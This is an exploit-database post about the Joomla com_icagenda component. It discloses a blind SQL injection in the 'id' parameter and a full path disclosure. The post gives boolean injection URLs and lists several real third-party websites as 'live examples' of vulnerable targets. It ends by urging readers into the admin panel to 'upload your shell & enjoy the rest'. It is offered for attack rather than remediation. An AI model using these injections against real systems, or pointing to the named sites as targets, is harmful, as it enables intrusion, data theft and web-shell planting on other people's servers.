Home / exploits Joomla ICAgenda SQL Injection / Path Disclosure
Posted on 01 September 2012
# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 # 0 _ __ __ __ 1 # 1 /' __ /'__` / \__ /'__` 0 # 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 # 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 # 0 / / / / \__/ \_ \_ / 1 # 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 # 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 # 1 \____/ >> Exploit database separated by exploit 0 # 0 /___/ type (local, remote, DoS, etc.) 1 # 1 1 # 0 [x] Official Website: http://www.1337day.com 0 # 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 # 0 0 # 1 ========================================== 1 # 0 I'm Dark-Puzzle From Inj3ct0r TEAM 0 # 0 1 # 1 dark-puzzle[at]live[at]fr 0 # 0 ========================================== 1 # 1 White Hat 1 # 0 Independant Pentester 0 # 1 exploit coder/bug researcher 0 # 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 # Exploit Title: Joomla Component (com_icagenda) Blind SQLi/Path Disclosure . # Date: 31 August 2012 # Author: Dark-Puzzle (Souhail Hammou) # Risk : Critical # Version: All Versions # Google Dork : N/A # Category: Webapps/0day # Tested on: Windows Xp Sp2 Fr . # Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ... *************************************************************************************** Info : Icagenda is a New Component for Event Management with a calendar module. ---------------------------------------------------- I - Blind SQL Injection Vulnerability ---------------------------------------------------- Vulnerability : "id" parameter in com_icagenda is prone to a Blind SQL Vulnerability . An attacker can retrieve & steal data by sending series of True and False Queries through SQL statements . Here the invisible content shows us that the target suffers from BSQLi . Example : www.hackme.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 (True) www.hackme.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 (False) Live Example : http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 (True) Content is displayed http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 (False) Other Live Examples : http://www.brie-danse.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=133&id=3 and 1=2 (False) --> Blind Injection . http://www.cocdklive.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=107&id=1 and 1=2 (False) --> Blind Injection ADMIN PANEL : http://target/administrator Then you can upload your shell & enjoy the rest . ----------------------------------------------------- II - Full Path Disclosure Vulnerability ----------------------------------------------------- The Full path can be retrieved using Array method [] in ItemID & id Parameters . Live Examples : http://www.cocdklive.com/index.php?option=com_icagenda&view=list&layout=event&Itemid[]=107&id=1 http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 # Datasec Team
